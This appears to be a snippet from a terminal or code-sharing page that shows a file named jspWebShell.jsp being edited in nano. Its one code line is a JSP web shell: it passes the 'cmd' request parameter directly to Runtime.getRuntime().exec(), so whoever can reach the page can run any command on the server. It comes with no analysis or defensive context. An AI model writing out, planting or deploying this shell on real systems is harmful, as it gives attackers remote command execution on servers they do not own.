root@oco:~$ nano jspWebShell.jsp ... <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ...
Last updated 3 months ago